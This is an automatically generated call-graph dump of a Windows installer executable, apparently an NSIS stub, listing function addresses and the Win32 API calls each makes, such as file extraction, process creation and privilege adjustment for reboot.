4157 100021af 4157->4153 4158->4134 4158->4137 4158->4141 4158->4142 4158->4145 4158->4150 4158->4153 4158->4155 4158->4156 4160 1000122c 2 API calls 4158->4160 4228 1000121b GlobalAlloc 4158->4228 4160->4158 4161->4146 4164 100022e8 4162->4164 4163 1000122c GlobalAlloc lstrcpynW 4163->4164 4164->4163 4166 10002415 GlobalFree 4164->4166 4168 100023d3 lstrlenW 4164->4168 4169 100023ba GlobalAlloc CLSIDFromString 4164->4169 4170 1000238f GlobalAlloc WideCharToMultiByte 4164->4170 4232 100012ba 4164->4232 4166->4164 4167 100017ae 4166->4167 4167->4048 4167->4049 4167->4060 4168->4166 4172 100023de 4168->4172 4169->4166 4170->4166 4172->4166 4236 100025d9 4172->4236 4174 100028b6 4173->4174 4175 1000295b VirtualAlloc 4174->4175 4176 10002979 4175->4176 4177 10002a75 4176->4177 4178 10002a6a GetLastError 4176->4178 4177->4060 4178->4177 4180 10002296 4179->4180 4181 100017a7 4179->4181 4180->4181 4182 100022a8 GlobalAlloc 4180->4182 4181->4041 4182->4180 4187 10002661 4183->4187 4184 100026b2 GlobalAlloc 4188 100026d4 4184->4188 4185 100026c5 4186 100026ca GlobalSize 4185->4186 4185->4188 4186->4188 4187->4184 4187->4185 4188->4064 4191 10002b6a 4189->4191 4190 10002baa GlobalFree 4191->4190 4239 1000121b GlobalAlloc 4192->4239 4194 10002530 StringFromGUID2 4197 100024b3 4194->4197 4195 10002541 lstrcpynW 4195->4197 4196 1000250b MultiByteToWideChar 4196->4197 4197->4194 4197->4195 4197->4196 4198 10002554 wsprintfW 4197->4198 4199 10002571 GlobalFree 4197->4199 4200 100025ac GlobalFree 4197->4200 4201 10001272 2 API calls 4197->4201 4240 100012e1 4197->4240 4198->4197 4199->4197 4200->4057 4201->4197 4244 1000121b GlobalAlloc 4203->4244 4205 100015ba 4206 100015c7 lstrcpyW 4205->4206 4208 100015e1 4205->4208 4209 100015fb 4206->4209 4208->4209 4210 100015e6 wsprintfW 4208->4210 4211 10001272 4209->4211 4210->4209 4212 100012b5 GlobalFree 4211->4212 4213 1000127b GlobalAlloc lstrcpynW 4211->4213 4212->4067 4213->4212 4215 10001861 4214->4215 4216 1000247a 4214->4216 4215->4074 4215->4075 4216->4215 4217 10002496 GlobalFree 4216->4217 4217->4216 4219 10001272 2 API calls 4218->4219 4220 1000155e 4219->4220 4220->4068 4221->4132 4222->4158 4224 100015ad 4223->4224 4224->4155 4231 1000121b GlobalAlloc 4225->4231 4227 1000123b lstrcpynW 4227->4153 4228->4158 4229->4149 4230->4157 4231->4227 4233 100012c1 4232->4233 4234 1000122c 2 API calls 4233->4234 4235 100012df 4234->4235 4235->4164 4237 100025e7 VirtualAlloc 4236->4237 4238 1000263d 4236->4238 4237->4238 4238->4172 4239->4197 4241 100012ea 4240->4241 4242 1000130c 4240->4242 4241->4242 4243 100012f0 lstrcpyW 4241->4243 4242->4197 4243->4242 4244->4205 5175 4016c4 5176 402bbf 18 API calls 5175->5176 5177 4016ca GetFullPathNameW 5176->5177 5178 4016e4 5177->5178 5184 401706 5177->5184 5180 40635d 2 API calls 5178->5180 5178->5184 5179 40171b GetShortPathNameW 5181 402a4c 5179->5181 5182 4016f6 5180->5182 5182->5184 5185 40601a lstrcpynW 5182->5185 5184->5179 5184->5181 5185->5184 5196 40194e 5197 402bbf 18 API calls 5196->5197 5198 401955 lstrlenW 5197->5198 5199 402531 5198->5199 5200 4027ce 5201 4027d6 5200->5201 5202 4027da FindNextFileW 5201->5202 5205 4027ec 5201->5205 5203 402833 5202->5203 5202->5205 5206 40601a lstrcpynW 5203->5206 5206->5205 5207 4048cf 5208 4048fb 5207->5208 5209 4048df 5207->5209 5210 404901 SHGetPathFromIDListW 5208->5210 5211 40492e 5208->5211 5218 405743 GetDlgItemTextW 5209->5218 5213 404911 5210->5213 5214 404918 SendMessageW 5210->5214 5216 40140b 2 API calls 5213->5216 5214->5211 5215 4048ec SendMessageW 5215->5208 5216->5214 5218->5215 4914 401754 4915 402bbf 18 API calls 4914->4915 4916 40175b 4915->4916 4917 405c1e 2 API calls 4916->4917 4918 401762 4917->4918 4919 405c1e 2 API calls 4918->4919 4919->4918 5226 401d56 GetDC GetDeviceCaps 5227 402ba2 18 API calls 5226->5227 5228 401d74 MulDiv ReleaseDC 5227->5228 5229 402ba2 18 API calls 5228->5229 5230 401d93 5229->5230 5231 40603c 18 API calls 5230->5231 5232 401dcc CreateFontIndirectW 5231->5232 5233 402531 5232->5233 5234 401a57 5235 402ba2 18 API calls 5234->5235 5236 401a5d 5235->5236 5237 402ba2 18 API calls 5236->5237 5238 401a05 5237->5238 5239 4014d7 5240 402ba2 18 API calls 5239->5240 5241 4014dd Sleep 5240->5241 5243 402a4c 5241->5243 5244 40155b 5245 4029f2 5244->5245 5248 405f61 wsprintfW 5245->5248 5247 4029f7 5248->5247 5046 401ddc 5047 402ba2 18 API calls 5046->5047 5048 401de2 5047->5048 5049 402ba2 18 API calls 5048->5049 5050 401deb 5049->5050 5051 401df2 ShowWindow 5050->5051 5052 401dfd EnableWindow 5050->5052 5053 402a4c 5051->5053 5052->5053 5087 401bdf 5088 402ba2 18 API calls 5087->5088 5089 401be6 5088->5089 5090 402ba2 18 API calls 5089->5090 5091 401bf0 5090->5091 5092 401c00 5091->5092 5094 402bbf 18 API calls 5091->5094 5093 401c10 5092->5093 5095 402bbf 18 API calls 5092->5095 5096 401c1b 5093->5096 5097 401c5f 5093->5097 5094->5092 5095->5093 5098 402ba2 18 API calls 5096->5098 5099 402bbf 18 API calls 5097->5099 5100 401c20 5098->5100 5101 401c64 5099->5101 5102 402ba2 18 API calls 5100->5102 5103 402bbf 18 API calls 5101->5103 5105 401c29 5102->5105 5104 401c6d FindWindowExW 5103->5104 5108 401c8f 5104->5108 5106 401c31 SendMessageTimeoutW 5105->5106 5107 401c4f SendMessageW 5105->5107 5106->5108 5107->5108 5109 4022df 5110 402bbf 18 API calls 5109->5110 5111 4022ee 5110->5111 5112 402bbf 18 API calls 5111->5112 5113 4022f7 5112->5113 5114 402bbf 18 API calls 5113->5114 5115 402301 GetPrivateProfileStringW 5114->5115 5249 401960 5250 402ba2 18 API calls 5249->5250 5251 401967 5250->5251 5252 402ba2 18 API calls 5251->5252 5253 401971 5252->5253 5254 402bbf 18 API calls 5253->5254 5255 40197a 5254->5255 5256 40198e lstrlenW 5255->5256 5257 4019ca 5255->5257 5258 401998 5256->5258 5258->5257 5262 40601a lstrcpynW 5258->5262 5260 4019b3 5260->5257 5261 4019c0 lstrlenW 5260->5261 5261->5257 5262->5260 5263 401662 5264 402bbf 18 API calls 5263->5264 5265 401668 5264->5265 5266 40635d 2 API calls 5265->5266 5267 40166e 5266->5267 5268 4066e2 5270 406566 5268->5270 5269 406ed1 5270->5269 5271 4065f0 GlobalAlloc 5270->5271 5272 4065e7 GlobalFree 5270->5272 5273 406667 GlobalAlloc 5270->5273 5274 40665e GlobalFree 5270->5274 5271->5269 5271->5270 5272->5271 5273->5269 5273->5270 5274->5273 5275 4019e4 5276 402bbf 18 API calls 5275->5276 5277 4019eb 5276->5277 5278 402bbf 18 API calls 5277->5278 5279 4019f4 5278->5279 5280 4019fb lstrcmpiW 5279->5280 5281 401a0d lstrcmpW 5279->5281 5282 401a01 5280->5282 5281->5282 4245 4025e5 4259 402ba2 4245->4259 4247 4025f4 4248 40263a ReadFile 4247->4248 4251 40267a MultiByteToWideChar 4247->4251 4252 40272f 4247->4252 4254 4026d3 4247->4254 4255 4026a0 SetFilePointer MultiByteToWideChar 4247->4255 4256 402740 4247->4256 4258 40272d 4247->4258 4271 405c72 ReadFile 4247->4271 4248->4247 4248->4258 4251->4247 4273 405f61 wsprintfW 4252->4273 4254->4247 4254->4258 4262 405cd0 SetFilePointer 4254->4262 4255->4247 4257 402761 SetFilePointer 4256->4257 4256->4258 4257->4258 4260 40603c 18 API calls 4259->4260 4261 402bb6 4260->4261 4261->4247 4263 405cec 4262->4263 4269 405d08 4262->4269 4264 405c72 ReadFile 4263->4264 4265 405cf8 4264->4265 4266 405d11 SetFilePointer 4265->4266 4267 405d39 SetFilePointer 4265->4267 4265->4269 4266->4267 4268 405d1c 4266->4268 4267->4269 4274 405ca1 WriteFile 4268->4274 4269->4254 4272 405c90 4271->4272 4272->4247 4273->4258 4275 405cbf 4274->4275 4275->4269 4276 401e66 4277 402bbf 18 API calls 4276->4277 4278 401e6c 4277->4278 4279 405179 25 API calls 4278->4279 4280 401e76 4279->4280 4294 4056fa CreateProcessW 4280->4294 4283 401edb CloseHandle 4287 40281e 4283->4287 4284 401e8c WaitForSingleObject 4285 401e9e 4284->4285 4286 401eb0 GetExitCodeProcess 4285->4286 4297 406430 4285->4297 4289 401ec2 4286->4289 4290 401ecf 4286->4290 4301 405f61 wsprintfW 4289->4301 4290->4283 4293 401ecd 4290->4293 4293->4283 4295 401e7c 4294->4295 4296 40572d CloseHandle 4294->4296 4295->4283 4295->4284 4295->4287 4296->4295 4298 40644d PeekMessageW 4297->4298 4299 406443 DispatchMessageW 4298->4299 4300 401ea5 WaitForSingleObject 4298->4300 4299->4298 4300->4285 4301->4293 4414 401767 4415 402bbf 18 API calls 4414->4415 4416 40176e 4415->4416 4417 401796 4416->4417 4418 40178e 4416->4418 4476 40601a lstrcpynW 4417->4476 4475 40601a lstrcpynW 4418->4475 4421 401794 4425 4062ae 5 API calls 4421->4425 4422 4017a1 4477 4059ce lstrlenW CharPrevW 4422->4477 4430 4017b3 4425->4430 4427 4017ef 4483 405bca GetFileAttributesW 4427->4483 4430->4427 4431 4017c5 CompareFileTime 4430->4431 4432 401885 4430->4432 4439 40603c 18 API calls 4430->4439 4444 40601a lstrcpynW 4430->4444 4450 40185c 4430->4450 4453 405bef GetFileAttributesW CreateFileW 4430->4453 4480 40635d FindFirstFileW 4430->4480 4486 40575f 4430->4486 4431->4430 4433 405179 25 API calls 4432->4433 4435 40188f 4433->4435 4434 405179 25 API calls 4452 401871 4434->4452 4454 403027 4435->4454 4438 4018b6 SetFileTime 4440 4018c8 CloseHandle 4438->4440 4439->4430 4441 4018d9 4440->4441 4440->4452 4442 4018f1 4441->4442 4443 4018de 4441->4443 4446 40603c 18 API calls 4442->4446 4445 40603c 18 API calls 4443->4445 4444->4430 4447 4018e6 lstrcatW 4445->4447 4448 4018f9 4446->4448 4447->4448 4451 40575f MessageBoxIndirectW 4448->4451 4450->4434 4450->4452 4451->4452 4453->4430 4456 403040 4454->4456 4455 40306b 4490 40320c 4455->4490 4456->4455 4500 403222 SetFilePointer 4456->4500 4460 403088 GetTickCount 4471 40309b 4460->4471 4461 4031ac 4462 4031b0 4461->4462 4467 4031c8 4461->4467 4464 40320c ReadFile 4462->4464 4463 4018a2 4463->4438 4463->4440 4464->4463 4465 40320c ReadFile 4465->4467 4466 40320c ReadFile 4466->4471 4467->4463 4467->4465 4468 405ca1 WriteFile 4467->4468 4468->4467 4470 403101 GetTickCount 4470->4471 4471->4463 4471->4466 4471->4470 4472 40312a MulDiv wsprintfW 4471->4472 4474 405ca1 WriteFile 4471->4474 4493 406533 4471->4493 4473 405179 25 API calls 4472->4473 4473->4471 4474->4471 4475->4421 4476->4422 4478 4017a7 lstrcatW 4477->4478 4479 4059ea lstrcatW 4477->4479 4478->4421 4479->4478 4481 406373 FindClose 4480->4481 4482 40637e 4480->4482 4481->4482 4482->4430 4484 405be9 4483->4484 4485 405bdc SetFileAttributesW 4483->4485 4484->4430 4485->4484 4487 405774 4486->4487 4488 4057c0 4487->4488 4489 405788 MessageBoxIndirectW 4487->4489 4488->4430 4489->4488 4491 405c72 ReadFile 4490->4491 4492 403076 4491->4492 4492->4460 4492->4461 4492->4463 4494 406558 4493->4494 4495 406560 4493->4495 4494->4471 4495->4494 4496 4065f0 GlobalAlloc 4495->4496 4497 4065e7 GlobalFree 4495->4497 4498 406667 GlobalAlloc 4495->4498 4499 40665e GlobalFree 4495->4499 4496->4494 4496->4495 4497->4496 4498->4494 4498->4495 4499->4498 4500->4455 5283 401ee9 5284 402bbf 18 API calls 5283->5284 5285 401ef0 5284->5285 5286 40635d 2 API calls 5285->5286 5287 401ef6 5286->5287 5289 401f07 5287->5289 5290 405f61 wsprintfW 5287->5290 5290->5289 5291 100018a9 5292 100018cc 5291->5292 5293 100018ff GlobalFree 5292->5293 5294 10001911 5292->5294 5293->5294 5295 10001272 2 API calls 5294->5295 5296 10001a87 GlobalFree GlobalFree 5295->5296 4504 40326a SetErrorMode GetVersion 4505 4032a5 4504->4505 4506 40329f 4504->4506 4592 406384 GetSystemDirectoryW 4505->4592 4507 4063f4 5 API calls 4506->4507 4507->4505 4509 4032bb lstrlenA 4509->4505 4510 4032cb 4509->4510 4595 4063f4 GetModuleHandleA 4510->4595 4513 4063f4 5 API calls 4514 4032da #17 OleInitialize SHGetFileInfoW 4513->4514 4601 40601a lstrcpynW 4514->4601 4516 403317 GetCommandLineW 4602 40601a lstrcpynW 4516->4602 4518 403329 GetModuleHandleW 4519 403341 4518->4519 4520 4059fb CharNextW 4519->4520 4521 403350 CharNextW 4520->4521 4522 40347a GetTempPathW 4521->4522 4530 403369 4521->4530 4603 403239 4522->4603 4524 403492 4525 403496 GetWindowsDirectoryW lstrcatW 4524->4525 4526 4034ec DeleteFileW 4524->4526 4527 403239 12 API calls 4525->4527 4613 402dee GetTickCount GetModuleFileNameW 4526->4613 4531 4034b2 4527->4531 4528 4059fb CharNextW 4528->4530 4530->4528 4536 403465 4530->4536 4538 403463 4530->4538 4531->4526 4533 4034b6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4531->4533 4532 403500 4534 4035b3 4532->4534 4539 4035a3 4532->4539 4543 4059fb CharNextW 4532->4543 4537 403239 12 API calls 4533->4537 4714 403789 4534->4714 4697 40601a lstrcpynW 4536->4697 4541 4034e4 4537->4541 4538->4522 4641 403863 4539->4641 4541->4526 4541->4534 4556 40351f 4543->4556 4545 4036ed 4548 403771 ExitProcess 4545->4548 4549 4036f5 GetCurrentProcess OpenProcessToken 4545->4549 4546 4035cd 4547 40575f MessageBoxIndirectW 4546->4547 4551 4035db ExitProcess 4547->4551 4554 403741 4549->4554 4555 40370d LookupPrivilegeValueW AdjustTokenPrivileges 4549->4555 4552 4035e3 4721 4056e2 4552->4721 4553 40357d 4698 405ad6 4553->4698 4559 4063f4 5 API calls 4554->4559 4555->4554 4556->4552 4556->4553 4562 403748 4559->4562 4565 40375d ExitWindowsEx 4562->4565 4566 40376a 4562->4566 4563 403604 lstrcatW lstrcmpiW 4563->4534 4568 403620 4563->4568 4564 4035f9 lstrcatW 4564->4563 4565->4548 4565->4566 4569 40140b 2 API calls 4566->4569 4571 403625 4568->4571 4572 40362c 4568->4572 4569->4548 4570 403598 4713 40601a lstrcpynW 4570->4713 4724 405648 CreateDirectoryW 4571->4724 4729 4056c5 CreateDirectoryW 4572->4729 4576 403631 SetCurrentDirectoryW 4578 403641 4576->4578 4579 40364c 4576->4579 4732 40601a lstrcpynW 4578->4732 4733 40601a lstrcpynW 4579->4733 4582 40603c 18 API calls 4583 40368b DeleteFileW 4582->4583 4584 403698 CopyFileW 4583->4584 4589 40365a 4583->4589 4584->4589 4585 4036e1 4586 405ebb 38 API calls 4585->4586 4586->4534 4588 40603c 18 API calls 4588->4589 4589->4582 4589->4585 4589->4588 4590 4056fa 2 API calls 4589->4590 4591 4036cc CloseHandle 4589->4591 4734 405ebb MoveFileExW 4589->4734 4590->4589 4591->4589 4593 4063a6 wsprintfW LoadLibraryExW 4592->4593 4593->4509 4596 406410 4595->4596 4597 40641a GetProcAddress 4595->4597 4599 406384 3 API calls 4596->4599 4598 4032d3 4597->4598 4598->4513 4600 406416 4599->4600 4600->4597 4600->4598 4601->4516 4602->4518 4604 4062ae 5 API calls 4603->4604 4605 403245 4604->4605 4606 40324f 4605->4606 4607 4059ce 3 API calls 4605->4607 4606->4524 4608 403257 4607->4608 4609 4056c5 2 API calls 4608->4609 4610 40325d 4609->4610 4738 405c1e 4610->4738 4742 405bef GetFileAttributesW CreateFileW 4613->4742 4615 402e2e 4634 402e3e 4615->4634 4743 40601a lstrcpynW 4615->4743 4617 402e54 4744 405a1a lstrlenW 4617->4744 4621 402e65 GetFileSize 4622 402e7c 4621->4622 4638 402f61 4621->4638 4625 40320c ReadFile 4622->4625 4628 402fcd 4622->4628 4622->4634 4636 402d8a 6 API calls 4622->4636 4622->4638 4624 402f6a 4626 402f9a GlobalAlloc 4624->4626 4624->4634 4761 403222 SetFilePointer 4624->4761 4625->4622 4760 403222 SetFilePointer 4626->4760 4631 402d8a 6 API calls 4628->4631 4630 402fb5 4633 403027 36 API calls 4630->4633 4631->4634 4632 402f83 4635 40320c ReadFile 4632->4635 4637 402fc1 4633->4637 4634->4532 4639 402f8e 4635->4639 4636->4622 4637->4634 4640 402ffe SetFilePointer 4637->4640 4749 402d8a 4638->4749 4639->4626 4639->4634 4640->4634 4642 4063f4 5 API calls 4641->4642 4643 403877 4642->4643 4644 40387d GetUserDefaultUILanguage 4643->4644 4645 40388f 4643->4645 4762 405f61 wsprintfW 4644->4762 4646 405ee7 3 API calls 4645->4646 4648 4038bf 4646->4648 4650 4038de lstrcatW 4648->4650 4651 405ee7 3 API calls 4648->4651 4649 40388d 4763 403b39 4649->4763 4650->4649 4651->4650 4654 405ad6 18 API calls 4655 403910 4654->4655 4656 4039a4 4655->4656 4658 405ee7 3 API calls 4655->4658 4657 405ad6 18 API calls 4656->4657 4659 4039aa 4657->4659 4661 403942 4658->4661 4660 4039ba LoadImageW 4659->4660 4662 40603c 18 API calls 4659->4662 4663 403a60 4660->4663 4664 4039e1 RegisterClassW 4660->4664 4661->4656 4665 403963 lstrlenW 4661->4665 4669 4059fb CharNextW 4661->4669 4662->4660 4668 40140b 2 API calls 4663->4668 4666 403a17 SystemParametersInfoW CreateWindowExW 4664->4666 4667 403a6a 4664->4667 4670 403971 lstrcmpiW 4665->4670 4671 403997 4665->4671 4666->4663 4667->4534 4672 403a66 4668->4672 4673 403960 4669->4673 4670->4671 4674 403981 GetFileAttributesW 4670->4674 4675 4059ce 3 API calls 4671->4675 4672->4667 4677 403b39 19 API calls 4672->4677 4673->4665 4676 40398d 4674->4676 4678 40399d 4675->4678 4676->4671 4679 405a1a 2 API calls 4676->4679 4680 403a77 4677->4680 4779 40601a lstrcpynW 4678->4779 4679->4671 4682 403a83 ShowWindow 4680->4682 4683 403b06 4680->4683 4685 406384 3 API calls 4682->4685 4772 40524c OleInitialize 4683->4772 4687 403a9b 4685->4687 4686 403b0c 4688 403b10 4686->4688 4689 403b28 4686->4689 4690 403aa9 GetClassInfoW 4687->4690 4692 406384 3 API calls 4687->4692 4688->4667 4696 40140b 2 API calls 4688->4696 4691 40140b 2 API calls 4689->4691 4693 403ad3 DialogBoxParamW 4690->4693 4694 403abd GetClassInfoW RegisterClassW 4690->4694 4691->4667 4692->4690 4695 40140b 2 API calls 4693->4695 4694->4693 4695->4667 4696->4667 4697->4538 4781 40601a lstrcpynW 4698->4781 4700 405ae7 4782 405a79 CharNextW CharNextW 4700->4782 4703 403589 4703->4534 4712 40601a lstrcpynW 4703->4712 4704 4062ae 5 API calls 4710 405afd 4704->4710 4705 405b2e lstrlenW 4706 405b39 4705->4706 4705->4710 4708 4059ce 3 API calls 4706->4708 4707 40635d 2 API calls 4707->4710 4709 405b3e GetFileAttributesW 4708->4709 4709->4703 4710->4703 4710->4705 4710->4707 4711 405a1a 2 API calls 4710->4711 4711->4705 4712->4570 4713->4539 4715 4037a1 4714->4715 4716 403793 CloseHandle 4714->4716 4788 4037ce 4715->4788 4716->4715 4722 4063f4 5 API calls 4721->4722 4723 4035e8 lstrcatW 4722->4723 4723->4563 4723->4564 4725 40362a 4724->4725 4726 405699 GetLastError 4724->4726 4725->4576 4726->4725 4727 4056a8 SetFileSecurityW 4726->4727 4727->4725 4728 4056be GetLastError 4727->4728 4728->4725 4730 4056d5 4729->4730 4731 4056d9 GetLastError 4729->4731 4730->4576 4731->4730 4732->4579 4733->4589 4735 405ecf 4734->4735 4737 405edc 4734->4737 4841 405d49 lstrcpyW 4735->4841 4737->4589 4739 405c2b GetTickCount GetTempFileNameW 4738->4739 4740 405c61 4739->4740 4741 403268 4739->4741 4740->4739 4740->4741 4741->4524 4742->4615 4743->4617 4745 405a28 4744->4745 4746 402e5a 4745->4746 4747 405a2e CharPrevW 4745->4747 4748 40601a lstrcpynW 4746->4748 4747->4745 4747->4746 4748->4621 4750 402d93 4749->4750 4751 402dab 4749->4751 4752 402da3 4750->4752 4753 402d9c DestroyWindow 4750->4753 4754 402db3 4751->4754 4755 402dbb GetTickCount 4751->4755 4752->4624 4753->4752 4756 406430 2 API calls 4754->4756 4757 402dc9 CreateDialogParamW ShowWindow 4755->4757 4758 402dec 4755->4758 4759 402db9 4756->4759 4757->4758 4758->4624 4759->4624 4760->4630 4761->4632 4762->4649 4764 403b4d 4763->4764 4780 405f61 wsprintfW 4764->4780 4766 403bbe 4767 40603c 18 API calls 4766->4767 4768 403bca SetWindowTextW 4767->4768 4769 4038ee 4768->4769 4770 403be6 4768->4770 4769->4654 4770->4769 4771 40603c 18 API calls 4770->4771 4771->4770 4773 40412a SendMessageW 4772->4773 4775 40526f 4773->4775 4774 40412a SendMessageW 4776 4052a8 OleUninitialize 4774->4776 4777 401389 2 API calls 4775->4777 4778 405296 4775->4778 4776->4686 4777->4775 4778->4774 4779->4656 4780->4766 4781->4700 4783 405a96 4782->4783 4784 405aa8 4782->4784 4783->4784 4785 405aa3 CharNextW 4783->4785 4786 4059fb CharNextW 4784->4786 4787 405acc 4784->4787 4785->4787 4786->4784 4787->4703 4787->4704 4789 4037dc 4788->4789 4790 4037a6 4789->4790 4791 4037e1 FreeLibrary GlobalFree 4789->4791 4792 40580b 4790->4792 4791->4790 4791->4791 4793 405ad6 18 API calls 4792->4793 4794 40582b 4793->4794 4795 405833 DeleteFileW 4794->4795 4796 40584a 4794->4796 4797 4035bc OleUninitialize 4795->4797 4798 40596a 4796->4798 4831 40601a lstrcpynW 4796->4831 4797->4545 4797->4546 4798->4797 4804 40635d 2 API calls 4798->4804 4800 405870 4801 405883 4800->4801 4802 405876 lstrcatW 4800->4802 4803 405a1a 2 API calls 4801->4803 4805 405889 4802->4805 4803->4805 4807 40598f 4804->4807 4806 405899 lstrcatW 4805->4806 4808 4058a4 lstrlenW FindFirstFileW 4805->4808 4806->4808 4807->4797 4809 405993 4807->4809 4808->4798 4816 4058c6 4808->4816 4810 4059ce 3 API calls 4809->4810 4811 405999 4810->4811 4813 4057c3 5 API calls 4811->4813 4812 40594d FindNextFileW 4812->4816 4817 405963 FindClose 4812->4817 4815 4059a5 4813->4815 4818 4059a9 4815->4818 4819 4059bf 4815->4819 4816->4812 4820 40590e 4816->4820 4832 40601a lstrcpynW 4816->4832 4817->4798 4818->4797 4823 405179 25 API calls 4818->4823 4822 405179 25 API calls 4819->4822 4820->4812 4824 40580b 62 API calls 4820->4824 4826 405179 25 API calls 4820->4826 4829 405179 25 API calls 4820->4829 4830 405ebb 38 API calls 4820->4830 4833 4057c3 4820->4833 4822->4797 4825 4059b6 4823->4825 4824->4820 4827 405ebb 38 API calls 4825->4827 4826->4812 4828 4059bd 4827->4828 4828->4797 4829->4820 4830->4820 4831->4800 4832->4816 4834 405bca 2 API calls 4833->4834 4835 4057cf 4834->4835 4836 4057f0 4835->4836 4837 4057e6 DeleteFileW 4835->4837 4838 4057de RemoveDirectoryW 4835->4838 4836->4820 4839 4057ec 4837->4839 4838->4839 4839->4836 4840 4057fc SetFileAttributesW 4839->4840 4840->4836 4842 405d71 4841->4842 4843 405d97 GetShortPathNameW 4841->4843 4868 405bef GetFileAttributesW CreateFileW 4842->4868 4844 405eb6 4843->4844 4845 405dac 4843->4845 4844->4737 4845->4844 4847 405db4 wsprintfA 4845->4847 4849 40603c 18 API calls 4847->4849 4848 405d7b CloseHandle GetShortPathNameW 4848->4844 4850 405d8f 4848->4850 4851 405ddc 4849->4851 4850->4843 4850->4844 4869 405bef GetFileAttributesW CreateFileW 4851->4869 4853 405de9 4853->4844 4854 405df8 GetFileSize GlobalAlloc 4853->4854 4855 405e1a 4854->4855 4856 405eaf CloseHandle 4854->4856 4857 405c72 ReadFile 4855->4857 4856->4844 4858 405e22 4857->4858 4858->4856 4870 405b54 lstrlenA 4858->4870 4861 405e39 lstrcpyA 4864 405e5b 4861->4864 4862 405e4d 4863 405b54 4 API calls 4862->4863 4863->4864 4865 405e92 SetFilePointer 4864->4865 4866 405ca1 WriteFile 4865->4866 4867 405ea8 GlobalFree 4866->4867 4867->4856 4868->4848 4869->4853 4871 405b95 lstrlenA 4870->4871 4872 405b9d 4871->4872 4873 405b6e lstrcmpiA 4871->4873 4872->4861 4872->4862 4873->4872 4874 405b8c CharNextA 4873->4874 4874->4871 5297 4021ea 5298 402bbf 18 API calls 5297->5298 5299 4021f0 5298->5299 5300 402bbf 18 API calls 5299->5300 5301 4021f9 5300->5301 5302 402bbf 18 API calls 5301->5302 5303 402202 5302->5303 5304 40635d 2 API calls 5303->5304 5305 40220b 5304->5305 5306 40221c lstrlenW lstrlenW 5305->5306 5310 40220f 5305->5310 5308 405179 25 API calls 5306->5308 5307 405179 25 API calls 5311 402217 5307->5311 5309 40225a SHFileOperationW 5308->5309 5309->5310 5309->5311 5310->5307 5310->5311 4891 40156b 4892 401584 4891->4892 4893 40157b ShowWindow 4891->4893 4894 401592 ShowWindow 4892->4894 4895 402a4c 4892->4895 4893->4892 4894->4895 5319 4050ed 5320 405111 5319->5320 5321 4050fd 5319->5321 5324 405119 IsWindowVisible 5320->5324 5330 405130 5320->5330 5322 405103 5321->5322 5323 40515a 5321->5323 5326 40412a SendMessageW 5322->5326 5325 40515f CallWindowProcW 5323->5325 5324->5323 5327 405126 5324->5327 5328 40510d 5325->5328 5326->5328 5332 404a43 SendMessageW 5327->5332 5330->5325 5337 404ac3 5330->5337 5333 404aa2 SendMessageW 5332->5333 5334 404a66 GetMessagePos ScreenToClient SendMessageW 5332->5334 5335 404a9a 5333->5335 5334->5335 5336 404a9f 5334->5336 5335->5330 5336->5333 5346 40601a lstrcpynW 5337->5346 5339 404ad6 5347 405f61 wsprintfW 5339->5347 5341 404ae0 5342 40140b 2 API calls 5341->5342 5343 404ae9 5342->5343 5348 40601a lstrcpynW 5343->5348 5345 404af0 5345->5323 5346->5339 5347->5341 5348->5345 5349 40226e 5350 402288 5349->5350 5351 402275 5349->5351 5352 40603c 18 API calls 5351->5352 5353 402282 5352->5353 5354 40575f MessageBoxIndirectW 5353->5354 5354->5350 5355 4014f1 SetForegroundWindow 5356 402a4c 5355->5356 5357 4041f2 lstrcpynW lstrlenW 4900 401673 4901 402bbf 18 API calls 4900->4901 4902 40167a 4901->4902 4903 402bbf 18 API calls 4902->4903 4904 401683 4903->4904 4905 402bbf 18 API calls 4904->4905 4906 40168c MoveFileW 4905->4906 4907 401698 4906->4907 4908 40169f 4906->4908 4910 401423 25 API calls 4907->4910 4909 40635d 2 API calls 4908->4909 4912 4021e1 4908->4912 4911 4016ae 4909->4911 4910->4912 4911->4912 4913 405ebb 38 API calls 4911->4913 4913->4907 5358 404af5 GetDlgItem GetDlgItem 5359 404b47 7 API calls 5358->5359 5368 404d60 5358->5368 5360 404bea DeleteObject 5359->5360 5361 404bdd SendMessageW 5359->5361 5362 404bf3 5360->5362 5361->5360 5363 404c2a 5362->5363 5367 40603c 18 API calls 5362->5367 5364 4040de 19 API calls 5363->5364 5369 404c3e 5364->5369 5365 404ef0 5370 404f02 5365->5370 5371 404efa SendMessageW 5365->5371 5366 404e44 5366->5365 5375 404e9d SendMessageW 5366->5375 5398 404d53 5366->5398 5372 404c0c SendMessageW SendMessageW 5367->5372 5368->5366 5373 404a43 5 API calls 5368->5373 5388 404dd1 5368->5388 5374 4040de 19 API calls 5369->5374 5378 404f14 ImageList_Destroy 5370->5378 5379 404f1b 5370->5379 5390 404f2b 5370->5390 5371->5370 5372->5362 5373->5388 5389 404c4c 5374->5389 5381 404eb2 SendMessageW 5375->5381 5375->5398 5376 404145 8 API calls 5382 4050e6 5376->5382 5377 404e36 SendMessageW 5377->5366 5378->5379 5383 404f24 GlobalFree 5379->5383 5379->5390 5380 40509a 5386 4050ac ShowWindow GetDlgItem ShowWindow 5380->5386 5380->5398 5385 404ec5 5381->5385 5383->5390 5384 404d21 GetWindowLongW SetWindowLongW 5387 404d3a 5384->5387 5396 404ed6 SendMessageW 5385->5396 5386->5398 5391 404d40 ShowWindow 5387->5391 5392 404d58 5387->5392 5388->5366 5388->5377 5389->5384 5395 404c9c SendMessageW 5389->5395 5397 404d1b 5389->5397 5399 404cd8 SendMessageW 5389->5399 5400 404ce9 SendMessageW 5389->5400 5390->5380 5401 404ac3 4 API calls 5390->5401 5405 404f66 5390->5405 5409 404113 SendMessageW 5391->5409 5410 404113 SendMessageW 5392->5410 5395->5389 5396->5365 5397->5384 5397->5387 5398->5376 5399->5389 5400->5389 5401->5405 5402 405070 InvalidateRect 5402->5380 5403 405086 5402->5403 5411 4049fe 5403->5411 5404 404f94 SendMessageW 5407 404faa 5404->5407 5405->5404 5405->5407 5407->5402 5408 40501e SendMessageW SendMessageW 5407->5408 5408->5407 5409->5398 5410->5368 5414 404935 5411->5414 5413 404a13 5413->5380 5415 40494e 5414->5415 5416 40603c 18 API calls 5415->5416 5417 4049b2 5416->5417 5418 40603c 18 API calls 5417->5418 5419 4049bd 5418->5419 5420 40603c 18 API calls 5419->5420 5421 4049d3 lstrlenW wsprintfW SetDlgItemTextW 5420->5421 5421->5413 5422 100016b6 5423 100016e5 5422->5423 5424 10001b18 22 API calls 5423->5424 5425 100016ec 5424->5425 